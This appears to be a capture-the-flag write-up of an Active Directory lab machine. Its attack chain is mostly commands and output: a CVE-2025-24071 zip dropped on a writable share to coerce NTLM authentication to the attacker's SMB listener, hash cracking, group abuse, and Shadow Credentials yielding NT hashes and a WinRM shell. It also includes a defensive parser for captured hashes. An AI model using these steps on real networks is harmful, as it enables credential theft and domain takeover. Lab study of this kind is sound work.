Information gathering

```
┌──(root㉿kali)-[/srv/ftp/incoming]
└─# nmap -sCV -p- --min-rate 10000 10.10.11.69
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-07-26 08:56 EDT
Nmap scan report for 10.10.11.69
Host is up (0.65s latency).
Not shown: 65516 filtered tcp ports (no-response)
PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-07-26 19:33:46Z)
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: fluffy.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-07-26T19:35:26+00:00; +6h36m16s from scanner time.
| ssl-cert: Subject: commonName=DC01.fluffy.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.fluffy.htb
| Not valid before: 2025-04-17T16:04:17
|_Not valid after:  2026-04-17T16:04:17
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: fluffy.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.fluffy.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.fluffy.htb
| Not valid before: 2025-04-17T16:04:17
|_Not valid after:  2026-04-17T16:04:17
|_ssl-date: 2025-07-26T19:35:25+00:00; +6h36m16s from scanner time.
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: fluffy.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-07-26T19:35:26+00:00; +6h36m16s from scanner time.
| ssl-cert: Subject: commonName=DC01.fluffy.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.fluffy.htb
| Not valid before: 2025-04-17T16:04:17
|_Not valid after:  2026-04-17T16:04:17
3269/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: fluffy.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.fluffy.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.fluffy.htb
| Not valid before: 2025-04-17T16:04:17
|_Not valid after:  2026-04-17T16:04:17
|_ssl-date: 2025-07-26T19:35:25+00:00; +6h36m16s from scanner time.
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp  open  mc-nmf        .NET Message Framing
49667/tcp open  msrpc         Microsoft Windows RPC
49689/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49690/tcp open  msrpc         Microsoft Windows RPC
49691/tcp open  msrpc         Microsoft Windows RPC
49707/tcp open  msrpc         Microsoft Windows RPC
49713/tcp open  msrpc         Microsoft Windows RPC
49742/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time:
|   date: 2025-07-26T19:34:49
|_  start_date: N/A
| smb2-security-mode:
|   3:1:1:
|_    Message signing enabled and required
|_clock-skew: mean: 6h36m15s, deviation: 0s, median: 6h36m15s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 155.50 seconds
```
Enumerate the SMB shares.
```
┌──(root㉿kali)-[/srv/ftp/incoming]
└─# crackmapexec smb 10.10.11.69 -u 'j.fleischman' -p 'J0elTHEM4n1990!' --shares
SMB         10.10.11.69     445    DC01             [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:fluffy.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.69     445    DC01             [+] fluffy.htb\j.fleischman:J0elTHEM4n1990!
SMB         10.10.11.69     445    DC01             [+] Enumerated shares
SMB         10.10.11.69     445    DC01             Share           Permissions     Remark
SMB         10.10.11.69     445    DC01             -----           -----------     ------
SMB         10.10.11.69     445    DC01             ADMIN$                          Remote Admin
SMB         10.10.11.69     445    DC01             C$                              Default share
SMB         10.10.11.69     445    DC01             IPC$            READ            Remote IPC
SMB         10.10.11.69     445    DC01             IT              READ,WRITE
SMB         10.10.11.69     445    DC01             NETLOGON        READ            Logon server share
SMB         10.10.11.69     445    DC01             SYSVOL          READ            Logon server share
```
```
┌──(root㉿kali)-[/myift/bachang/htb/8/2fluffy]
└─# smbclient //10.10.11.69/IT -U "j.fleischman"
Password for [WORKGROUP\j.fleischman]:
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Mon May 19 10:27:02 2025
  ..                                  D        0  Mon May 19 10:27:02 2025
  Everything-1.4.1.1026.x64           D        0  Fri Apr 18 11:08:44 2025
  Everything-1.4.1.1026.x64.zip       A  1827464  Fri Apr 18 11:04:05 2025
  KeePass-2.58                        D        0  Fri Apr 18 11:08:38 2025
  KeePass-2.58.zip                    A  3225346  Fri Apr 18 11:03:17 2025
  Upgrade_Notice.pdf                  A   169963  Sat May 17 10:31:07 2025

                5842943 blocks of size 4096. 2047262 blocks available
smb: \> get Upgrade_Notice.pdf
getting file \Upgrade_Notice.pdf of size 169963 as Upgrade_Notice.pdf (39.4 KiloBytes/sec) (average 39.4 KiloBytes/sec)
smb: \> exit
```
The upgrade notice shows they are in the middle of patching vulnerabilities; let's see which of the listed ones we can exploit.

CVE-2025-24071 leaks NTLM hashes through RAR/ZIP extraction of a .library-ms file: when the archive is extracted, Explorer processes the library file and authenticates to the SMB path it points to. Since the IT share is writable, we can upload such a zip and capture an NTLM hash from whoever extracts it.
```
┌──(root㉿kali)-[/myift/…/htb/8/2fluffy/CVE-2025-24071-main]
└─# python3 exploit.py -i 10.10.14.41 -f exploit
[ASCII-art banner omitted]
Windows File Explorer Spoofing Vulnerability (CVE-2025-24071) by ThemeHackers

Creating exploit with filename: exploit.library-ms
Target IP: 10.10.14.41
Generating library file...
✓ Library file created successfully
Creating ZIP archive...
✓ ZIP file created successfully
Cleaning up temporary files...
✓ Cleanup completed

Process completed successfully!
Output file: exploit.zip
Run this file on the victim machine and you will see the effects of the vulnerability such as using ftp smb to send files etc.

┌──(root㉿kali)-[/myift/…/htb/8/2fluffy/CVE-2025-24071-main]
└─# ls
exploit.py  exploit.zip  LICENSE  README.md  requirements.txt
```
Upload the zip to the IT share.
```
┌──(root㉿kali)-[/myift/…/htb/8/2fluffy/CVE-2025-24071-main]
└─# smbclient //10.10.11.69/IT -U j.fleischman%J0elTHEM4n1990! -c "put exploit.zip"
putting file exploit.zip as \exploit.zip (0.5 kb/s) (average 0.5 kb/s)
```
Check the listener output. The SMB server was started beforehand on our machine (10.10.14.41, the IP baked into the library file); shortly after the upload, a user on the target extracts the archive and authenticates to it.
```
┌──(root㉿kali)-[/myift/…/htb/8/2fluffy/CVE-2025-24071-main]
└─# impacket-smbserver share ./share -smb2support
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Incoming connection (10.10.11.69,56480)
[*] AUTHENTICATE_MESSAGE (FLUFFY\p.agila,DC01)
[*] User DC01\p.agila authenticated successfully
[*] p.agila::FLUFFY:aaaaaaaaaaaaaaaa:a7120225a7fb4ee9ee78350d0efe3ae0:01010000000000008035c548d3fedb01ce761f9e03b5545100000000010010006500410055006f004e00480043007100030010006500410055006f004e004800430071000200100050004f0043005600720068004f004a000400100050004f0043005600720068004f004a00070008008035c548d3fedb010600040002000000080030003000000000000000010000000020000054e6a940f446806547868bec8520a22e30044cd616e1285d3ed58bb14b4ac0e30a001000000000000000000000000000000000000900200063006900660073002f00310030002e00310030002e00310034002e00340031000000000000000000
[*] Closing down connection (10.10.11.69,56480)
[*] Remaining connections []
[*] Incoming connection (10.10.11.69,56481)
[*] AUTHENTICATE_MESSAGE (FLUFFY\p.agila,DC01)
[*] User DC01\p.agila authenticated successfully
[*] p.agila::FLUFFY:aaaaaaaaaaaaaaaa:80a8687700e04829ba984d1db8650078:010100000000000000cc5d49d3fedb0168aa22537e749fa300000000010010006500410055006f004e00480043007100030010006500410055006f004e004800430071000200100050004f0043005600720068004f004a000400100050004f0043005600720068004f004a000700080000cc5d49d3fedb010600040002000000080030003000000000000000010000000020000054e6a940f446806547868bec8520a22e30044cd616e1285d3ed58bb14b4ac0e30a001000000000000000000000000000000000000900200063006900660073002f00310030002e00310030002e00310034002e00340031000000000000000000
[*] Closing down connection (10.10.11.69,56481)
[*] Remaining connections []
[*] Incoming connection (10.10.11.69,56482)
[*] AUTHENTICATE_MESSAGE (FLUFFY\p.agila,DC01)
[*] User DC01\p.agila authenticated successfully
[*] p.agila::FLUFFY:aaaaaaaaaaaaaaaa:fc9eb9eb14397ee2dcf26130cd255fa0:01010000000000008062f649d3fedb0185c03b96bcce126b00000000010010006500410055006f004e00480043007100030010006500410055006f004e004800430071000200100050004f0043005600720068004f004a000400100050004f0043005600720068004f004a00070008008062f649d3fedb010600040002000000080030003000000000000000010000000020000054e6a940f446806547868bec8520a22e30044cd616e1285d3ed58bb14b4ac0e30a001000000000000000000000000000000000000900200063006900660073002f00310030002e00310030002e00310034002e00340031000000000000000000
[*] Closing down connection (10.10.11.69,56482)
[*] Remaining connections []
[*] Incoming connection (10.10.11.69,56483)
[*] AUTHENTICATE_MESSAGE (FLUFFY\p.agila,DC01)
[*] User DC01\p.agila authenticated successfully
[*] p.agila::FLUFFY:aaaaaaaaaaaaaaaa:1521ba3de8c9bcf81945b1ddd6deea59:010100000000000000f98e4ad3fedb01f76458b180d1935000000000010010006500410055006f004e00480043007100030010006500410055006f004e004800430071000200100050004f0043005600720068004f004a000400100050004f0043005600720068004f004a000700080000f98e4ad3fedb010600040002000000080030003000000000000000010000000020000054e6a940f446806547868bec8520a22e30044cd616e1285d3ed58bb14b4ac0e30a001000000000000000000000000000000000000900200063006900660073002f00310030002e00310030002e00310034002e00340031000000000000000000
[*] Closing down connection (10.10.11.69,56483)
[*] Remaining connections []
[*] Incoming connection (10.10.11.69,56484)
[*] AUTHENTICATE_MESSAGE (FLUFFY\p.agila,DC01)
[*] User DC01\p.agila authenticated successfully
[*] p.agila::FLUFFY:aaaaaaaaaaaaaaaa:4ec9d35651b43f15a855247dea1bfc42:0101000000000000808f274bd3fedb01e00f7352c66005fe00000000010010006500410055006f004e00480043007100030010006500410055006f004e004800430071000200100050004f0043005600720068004f004a000400100050004f0043005600720068004f004a0007000800808f274bd3fedb010600040002000000080030003000000000000000010000000020000054e6a940f446806547868bec8520a22e30044cd616e1285d3ed58bb14b4ac0e30a001000000000000000000000000000000000000900200063006900660073002f00310030002e00310030002e00310034002e00340031000000000000000000
[*] Closing down connection (10.10.11.69,56484)
[*] Remaining connections []
```
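The capture lines above carry more than a crackable hash. The long hex blob is the NTLMv2_CLIENT_CHALLENGE structure from MS-NLMP, and its AV_PAIR list records the client's timestamp and the target name the client believed it was authenticating to (here cifs/10.10.14.41, i.e. the rogue SMB server). The following parser is an added example, not part of the original writeup or of impacket; it decodes one such line so that an incident responder can tell who authenticated, to what, and when, without cracking anything. The list of "static" server challenges is an assumption of this example (an illustrative set of values capture tools are known to hard-code, not an exhaustive list), and the sample line is the last capture from the listener output above.

```python
"""Decode the metadata in a captured NetNTLMv2 response line (hashcat mode 5600).

Added example, not part of the original writeup. Layout follows MS-NLMP:
NTLMv2_CLIENT_CHALLENGE (section 2.2.2.7) and AV_PAIR (section 2.2.2.1).
"""
import struct
from datetime import datetime, timedelta, timezone

# AV_PAIR AvId values that carry UTF-16LE strings.
AV_NAMES = {
    1: "NbComputerName",
    2: "NbDomainName",
    3: "DnsComputerName",
    4: "DnsDomainName",
    5: "DnsTreeName",
    9: "TargetName",
}
AV_EOL = 0
AV_TIMESTAMP = 7

# Assumption: illustrative list of server challenges hard-coded by capture tools.
# A real file server draws a fresh random challenge for every session.
STATIC_CHALLENGES = {"aaaaaaaaaaaaaaaa", "1122334455667788"}

FILETIME_EPOCH = datetime(1601, 1, 1, tzinfo=timezone.utc)


def filetime_to_datetime(ft: int) -> datetime:
    """Windows FILETIME (100 ns ticks since 1601-01-01 UTC) -> aware datetime."""
    return FILETIME_EPOCH + timedelta(microseconds=ft // 10)


def parse_netntlmv2(line: str) -> dict:
    """Parse one 'user::domain:serverchallenge:NTProofStr:blob' capture line."""
    user, _, domain, server_challenge, nt_proof_str, blob_hex = line.strip().split(":", 5)
    blob = bytes.fromhex(blob_hex)
    if blob[0] != 1 or blob[1] != 1:
        raise ValueError("not an NTLMv2_CLIENT_CHALLENGE blob (RespType/HiRespType != 1)")
    (timestamp,) = struct.unpack_from("<Q", blob, 8)   # 8-byte FILETIME at offset 8
    client_challenge = blob[16:24].hex()                # 8 random client bytes
    av_pairs = {}
    off = 28                                            # AV_PAIR list starts after Reserved3
    while off + 4 <= len(blob):
        av_id, av_len = struct.unpack_from("<HH", blob, off)
        off += 4
        if av_id == AV_EOL:
            break
        value = blob[off:off + av_len]
        off += av_len
        if av_id in AV_NAMES:
            av_pairs[AV_NAMES[av_id]] = value.decode("utf-16-le")
        elif av_id == AV_TIMESTAMP:
            av_pairs["Timestamp"] = filetime_to_datetime(struct.unpack("<Q", value)[0])
    return {
        "user": user,
        "domain": domain,
        "server_challenge": server_challenge,
        "nt_proof_str": nt_proof_str,
        "client_challenge": client_challenge,
        "timestamp_utc": filetime_to_datetime(timestamp),
        "target_name": av_pairs.get("TargetName"),
        "av_pairs": av_pairs,
    }


def is_static_challenge(record: dict) -> bool:
    """True when the server challenge is one a capture tool hard-codes."""
    return record["server_challenge"].lower() in STATIC_CHALLENGES


def summarize(lines):
    """One line per capture: who authenticated, to which target name, and when."""
    out = []
    for line in lines:
        if not line.strip():
            continue
        r = parse_netntlmv2(line)
        flag = " [static server challenge: capture tool]" if is_static_challenge(r) else ""
        out.append(f"{r['domain']}\\{r['user']} -> {r['target_name']} "
                   f"at {r['timestamp_utc']:%Y-%m-%d %H:%M:%S}Z{flag}")
    return out


# Constructed input: the last capture line from the listener output above.
SAMPLE = (
    "p.agila::FLUFFY:aaaaaaaaaaaaaaaa:4ec9d35651b43f15a855247dea1bfc42:"
    "0101000000000000" "808f274bd3fedb01" "e00f7352c66005fe" "00000000"
    "01001000" "6500410055006f004e00480043007100"
    "03001000" "6500410055006f004e00480043007100"
    "02001000" "50004f0043005600720068004f004a00"
    "04001000" "50004f0043005600720068004f004a00"
    "07000800" "808f274bd3fedb01"
    "06000400" "02000000"
    "08003000" "3000000000000000" "0100000000200000"
    "54e6a940f446806547868bec8520a22e" "30044cd616e1285d3ed58bb14b4ac0e3"
    "0a001000" "00000000000000000000000000000000"
    "09002000" "63006900660073002f00310030002e00310030002e00310034002e0034003100"
    "00000000" "00000000"
)

if __name__ == "__main__":
    for s in summarize([SAMPLE]):
        print(s)
```

The timestamp comes from the client's clock (DC01 here, which nmap showed running 6h36m ahead of the scanner), so correlate it against the DC's time, not the listener's. The target name is the most useful field for a defender: it names the host the victim was coerced into authenticating to, which is where a relay or capture server was listening.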
Crack the captured hash.
```
┌──(root㉿kali)-[/myift/…/htb/8/2fluffy/CVE-2025-24071-main]
└─# hashcat --identify hash
The following hash-mode match the structure of your input hash:

      # | Name                                                       | Category
  ======+============================================================+======================================
   5600 | NetNTLMv2                                                  | Network Protocol

┌──(root㉿kali)-[/myift/…/htb/8/2fluffy/CVE-2025-24071-main]
└─# cat hash
p.agila::FLUFFY:aaaaaaaaaaaaaaaa:4ec9d35651b43f15a855247dea1bfc42:0101000000000000808f274bd3fedb01e00f7352c66005fe00000000010010006500410055006f004e00480043007100030010006500410055006f004e004800430071000200100050004f0043005600720068004f004a000400100050004f0043005600720068004f004a0007000800808f274bd3fedb010600040002000000080030003000000000000000010000000020000054e6a940f446806547868bec8520a22e30044cd616e1285d3ed58bb14b4ac0e30a001000000000000000000000000000000000000900200063006900660073002f00310030002e00310030002e00310034002e00340031000000000000000000

┌──(root㉿kali)-[/myift/…/htb/8/2fluffy/CVE-2025-24071-main]
└─# hashcat -m 5600 -a 0 hash /usr/share/wordlists/rockyou.txt
hashcat (v6.2.6) starting

OpenCL API (OpenCL 3.0 PoCL 6.0+debian  Linux, None+Asserts, RELOC, LLVM 17.0.6, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
============================================================================================================================================
* Device #1: cpu-sandybridge-11th Gen Intel(R) Core(TM) i5-1135G7 @ 2.40GHz, 2212/4489 MB (1024 MB allocatable), 4MCU

Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256

Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1

Optimizers applied:
* Zero-Byte
* Not-Iterated
* Single-Hash
* Single-Salt

ATTENTION! Pure (unoptimized) backend kernels selected.
Pure kernels can crack longer passwords, but drastically reduce performance.
If you want to switch to optimized kernels, append -O to your commandline.
See the above message to find out about the exact limits.

Watchdog: Temperature abort trigger set to 90c

Host memory required for this attack: 1 MB

Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385

Cracking performance lower than expected?

* Append -O to the commandline.
  This lowers the maximum supported password/salt length (usually down to 32).

* Append -w 3 to the commandline.
  This can cause your screen to lag.

* Append -S to the commandline.
  This has a drastic speed impact but can be better for specific attacks.
  Typical scenarios are a small wordlist but a large ruleset.

* Update your backend API runtime / driver the right way:
  https://hashcat.net/faq/wrongdriver

* Create more work items to make use of your parallelization power:
  https://hashcat.net/faq/morework

P.AGILA::FLUFFY:aaaaaaaaaaaaaaaa:4ec9d35651b43f15a855247dea1bfc42:0101000000000000808f274bd3fedb01e00f7352c66005fe00000000010010006500410055006f004e00480043007100030010006500410055006f004e004800430071000200100050004f0043005600720068004f004a000400100050004f0043005600720068004f004a0007000800808f274bd3fedb010600040002000000080030003000000000000000010000000020000054e6a940f446806547868bec8520a22e30044cd616e1285d3ed58bb14b4ac0e30a001000000000000000000000000000000000000900200063006900660073002f00310030002e00310030002e00310034002e00340031000000000000000000:prometheusx-303

Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 5600 (NetNTLMv2)
Hash.Target......: P.AGILA::FLUFFY:aaaaaaaaaaaaaaaa:4ec9d35651b43f15a8...000000
Time.Started.....: Sun Jul 27 06:34:58 2025 (7 secs)
Time.Estimated...: Sun Jul 27 06:35:05 2025 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:   789.9 kH/s (1.58ms) @ Accel:512 Loops:1 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 4517888/14344385 (31.50%)
Rejected.........: 0/4517888 (0.00%)
Restore.Point....: 4515840/14344385 (31.48%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: proretriever -> progree
Hardware.Mon.#1..: Util: 68%

Started: Sun Jul 27 06:34:56 2025
Stopped: Sun Jul 27 06:35:06 2025
```
This gives P.AGILA's password: prometheusx-303.

Next, look at what P.AGILA is allowed to do.
Shadow Credentials attack

p.agila is a member of the Service Account Managers group. That membership lets the user add itself to the Service Accounts group, which in turn holds GenericWrite over the svc accounts. Combined with the domain's certificate authority, that write access enables a Shadow Credentials attack, which means we can obtain those accounts' hashes. Let's test further.
```
┌──(root㉿kali)-[/myift/…/htb/8/2fluffy/CVE-2025-24071-main]
└─# bloodyAD -d fluffy.htb -u p.agila -p 'prometheusx-303' --dc-ip 10.10.11.69 add groupMember 'SERVICE ACCOUNTS' p.agila
[+] p.agila added to SERVICE ACCOUNTS

┌──(root㉿kali)-[/myift/…/htb/8/2fluffy/CVE-2025-24071-main]
└─# certipy-ad find -u p.agila -p prometheusx-303 -dc-ip 10.10.11.69
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Finding certificate templates
[*] Found 33 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 11 enabled certificate templates
[*] Trying to get CA configuration for 'fluffy-DC01-CA' via CSRA
[!] Got error while trying to get CA configuration for 'fluffy-DC01-CA' via CSRA: Could not connect: timed out
[*] Trying to get CA configuration for 'fluffy-DC01-CA' via RRP
[!] Failed to connect to remote registry. Service should be starting now. Trying again...
[*] Got CA configuration for 'fluffy-DC01-CA'
[*] Saved BloodHound data to '20250727134014_Certipy.zip'. Drag and drop the file into the BloodHound GUI from @ly4k
[*] Saved text output to '20250727134014_Certipy.txt'
[*] Saved JSON output to '20250727134014_Certipy.json'
```
Check which attributes we can now write on the target accounts.
```
┌──(root㉿kali)-[/myift/…/htb/8/2fluffy/CVE-2025-24071-main]
└─# bloodyAD -d fluffy.htb -u p.agila -p 'prometheusx-303' --dc-ip 10.10.11.69 get writable --detail

distinguishedName: CN=S-1-5-11,CN=ForeignSecurityPrincipals,DC=fluffy,DC=htb
url: WRITE
wWWHomePage: WRITE

distinguishedName: CN=certificate authority service,CN=Users,DC=fluffy,DC=htb
shadowFlag: WRITE
shadowExpire: WRITE
shadowInactive: WRITE
shadowWarning: WRITE
shadowMax: WRITE
shadowMin: WRITE
shadowLastChange: WRITE
loginShell: WRITE
unixHomeDirectory: WRITE
gecos: WRITE
gidNumber: WRITE
uidNumber: WRITE
msSFU30NisDomain: WRITE
msSFU30Name: WRITE
labeledURI: WRITE
userPKCS12: WRITE
preferredLanguage: WRITE
thumbnailLogo: WRITE
thumbnailPhoto: WRITE
```
An attacker can write their own public key into the target user's msDS-KeyCredentialLink attribute. Once the write succeeds, the domain controller trusts that new public key, so the attacker can use the matching private key to obtain a certificate or a Kerberos ticket (PKINIT) and authenticate as the target user.

Because the attacker can forge a valid key credential for any domain user whose attribute they can write, if the target is a domain administrator the attacker can log in as a domain administrator, achieving privilege escalation.
Run the Shadow Credentials attack to obtain the winrm_svc user's hash.
```
┌──(root㉿kali)-[/myift/…/htb/8/2fluffy/CVE-2025-24071-main]
└─# certipy-ad shadow auto -debug -u 'p.agila@fluffy.htb' -p 'prometheusx-303' -account 'winrm_svc' -target dc01.fluffy.htb -dc-ip 10.10.11.69
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[+] Trying to resolve 'dc01.fluffy.htb' at '10.10.11.69'
[+] Authenticating to LDAP server
[+] Bound to ldaps://10.10.11.69:636 - ssl
[+] Default path: DC=fluffy,DC=htb
[+] Configuration path: CN=Configuration,DC=fluffy,DC=htb
[*] Targeting user 'winrm_svc'
[*] Generating certificate
[*] Certificate generated
[*] Generating Key Credential
[*] Key Credential generated with DeviceID '5d3553d2-81b4-8f70-e7ad-bc195c5a218d'
<KeyCredential structure at 0x7f0b38d54050>
  | Owner: CN=winrm service,CN=Users,DC=fluffy,DC=htb
  | Version: 0x200
  | KeyID: Oxq4/4W2f43XCTsLj1HiG8ca7dKNJGE7JqBXquQfqN4=
  | KeyHash: 8a412cd101147142e8adc9245b594b8a059bd3a65c9df02765f9536432dad160
  | RawKeyMaterial: <dsinternals.common.cryptography.RSAKeyMaterial.RSAKeyMaterial object at 0x7f0b3907bd90>
  |  | Exponent (E): 65537
  |  | Modulus (N): 0xcf126d263713ac29300f96235d6e90062a24b425deaf92ab717b9052859dc9e985ab98bacdedc98386c85a64eafa70a6f820cd2389c3fdf83f788f6ad30262c7e733f504f573c2f4c38694307b00581cf10dffc4150895ad9ebe63209c0d04443f2f3049579d8af853c29630eae2f5774d7014fc2e3b971143ce61b3b6202143bc0521bbb5a4431c67d22ff444d6ef98eed6be73c01456b076863d1a1de92edeb50bff4660fa3e5b8e0fc40b3fd19809648b010589e2733da0949de1c0a0c9723c7914b2e52ca6235452e226c1e98f69b47db6cd7e2da0e2f23d62cac8f4a0a1effc6833cdd34fb7f9ccfd481c87a03eedcec5d271e32b9de1674ac081e321c1
  |  | Prime1 (P): 0x0
  |  | Prime2 (Q): 0x0
  | Usage: KeyUsage.NGC
  | LegacyUsage: None
  | Source: KeySource.AD
  | DeviceId: 5d3553d2-81b4-8f70-e7ad-bc195c5a218d
  | CustomKeyInfo: <CustomKeyInformation at 0x7f0b38d03e80>
  |  | Version: 1
  |  | Flags: KeyFlags.NONE
  |  | VolumeType: None
  |  | SupportsNotification: None
  |  | FekKeyVersion: None
  |  | Strength: None
  |  | Reserved: None
  |  | EncodedExtendedCKI: None
  | LastLogonTime (UTC): 2025-07-27 18:09:41.322062
  | CreationTime (UTC): 2025-07-27 18:09:41.322062
[+] Key Credential: B:828:...:CN=winrm service,CN=Users,DC=fluffy,DC=htb
[*] Adding Key Credential with device ID '5d3553d2-81b4-8f70-e7ad-bc195c5a218d' to the Key Credentials for 'winrm_svc'
[*] Successfully added Key Credential with device ID '5d3553d2-81b4-8f70-e7ad-bc195c5a218d' to the Key Credentials for 'winrm_svc'
[*] Authenticating as 'winrm_svc' with the certificate
[*] Using principal: winrm_svc@fluffy.htb
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'winrm_svc.ccache'
[*] Trying to retrieve NT hash for 'winrm_svc'
[*] Restoring the old Key Credentials for 'winrm_svc'
[*] Successfully restored the old Key Credentials for 'winrm_svc'
[*] NT hash for 'winrm_svc': 33bd09dcd697600edf6b3a7af4875767
```
We now have the NT hash of the WINRM_SVC user.
```
┌──(root㉿kali)-[/myift/…/htb/8/2fluffy/CVE-2025-24071-main]
└─# evil-winrm -i 10.10.11.69 -u 'WINRM_SVC' -H '33bd09dcd697600edf6b3a7af4875767'

Evil-WinRM shell v3.7

Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\winrm_svc\Documents> cd ..
*Evil-WinRM* PS C:\Users\winrm_svc> cd desktop
*Evil-WinRM* PS C:\Users\winrm_svc\desktop> type user.txt
cc89*****************
```
User flag obtained.

Next, get the ca_svc user's hash the same way. First sync our clock with the DC: Kerberos rejects requests when the clock skew exceeds five minutes, and the nmap scan showed the DC running 6h36m ahead of us.
```
┌──(root㉿kali)-[/myift/…/htb/8/2fluffy/CVE-2025-24071-main]
└─# ntpdate 10.10.11.69
2025-07-27 16:15:49.117859 (-0400) +3381.164582 +/- 0.336972 10.10.11.69 s1 no-leap
CLOCK: time stepped by 3381.164582

┌──(root㉿kali)-[/myift/…/htb/8/2fluffy/CVE-2025-24071-main]
└─# certipy-ad shadow auto -debug -u 'p.agila@fluffy.htb' -p 'prometheusx-303' -account 'ca_svc' -target dc01.fluffy.htb -dc-ip 10.10.11.69
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[+] Trying to resolve 'dc01.fluffy.htb' at '10.10.11.69'
[+] Authenticating to LDAP server
[+] Bound to ldaps://10.10.11.69:636 - ssl
[+] Default path: DC=fluffy,DC=htb
[+] Configuration path: CN=Configuration,DC=fluffy,DC=htb
[*] Targeting user 'ca_svc'
[*] Generating certificate
[*] Certificate generated
[*] Generating Key Credential
[*] Key Credential generated with DeviceID '0e40c569-4e25-5ca5-c416-b04df7c3dd51'
<KeyCredential structure at 0x7f66a40bfc50>
  | Owner: CN=certificate authority service,CN=Users,DC=fluffy,DC=htb
  | Version: 0x200
  | KeyID: Ohnn3EPYflTVG80nuKy52xET0rM7YCqLDT+uamRAOEk=
  | KeyHash: 2910c4f1a2f7374ae1d67e14e8f51e69a2959c80331fc0aafe4da485ebc2d3a9
  | RawKeyMaterial: <dsinternals.common.cryptography.RSAKeyMaterial.RSAKeyMaterial object at 0x7f66a40bf9d0>
  |  | Exponent (E): 65537
  |  | Modulus (N): ...
  |  | Prime1 (P): 0x0
  |  | Prime2 (Q): 0x0
  | Usage: KeyUsage.NGC
  | LegacyUsage: None
  | Source: KeySource.AD
  | DeviceId: 0e40c569-4e25-5ca5-c416-b04df7c3dd51
  | CustomKeyInfo: <CustomKeyInformation at 0x7f66a3d5fc50>
  |  | Version: 1
  |  | Flags: KeyFlags.NONE
  |  | VolumeType: None
  |  | SupportsNotification: None
  |  | FekKeyVersion: None
  |  | Strength: None
  |  | Reserved: None
  |  | EncodedExtendedCKI: None
  | LastLogonTime (UTC): 2025-07-27 20:17:15.073256
  | CreationTime (UTC): 2025-07-27 20:17:15.073256
[+] Key Credential: B:828:...:CN=certificate authority service,CN=Users,DC=fluffy,DC=htb
[*] Adding Key Credential with device ID '0e40c569-4e25-5ca5-c416-b04df7c3dd51' to the Key Credentials for 'ca_svc'
[*] Successfully added Key Credential with device ID '0e40c569-4e25-5ca5-c416-b04df7c3dd51' to the Key Credentials for 'ca_svc'
[*] Authenticating as 'ca_svc' with the certificate
[*] Using principal: ca_svc@fluffy.htb
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'ca_svc.ccache'
[*] Trying to retrieve NT hash for 'ca_svc'
[*] Restoring the old Key Credentials for 'ca_svc'
[*] Successfully restored the old Key Credentials for 'ca_svc'
[*] NT hash for 'ca_svc': ca0f4f9e9eb8a092addf53bb03fc98c8
```
CA certificate template attack - ESC16

```
┌──(root㉿kali)-[/myift/…/htb/8/2fluffy/CVE-2025-24071-main]
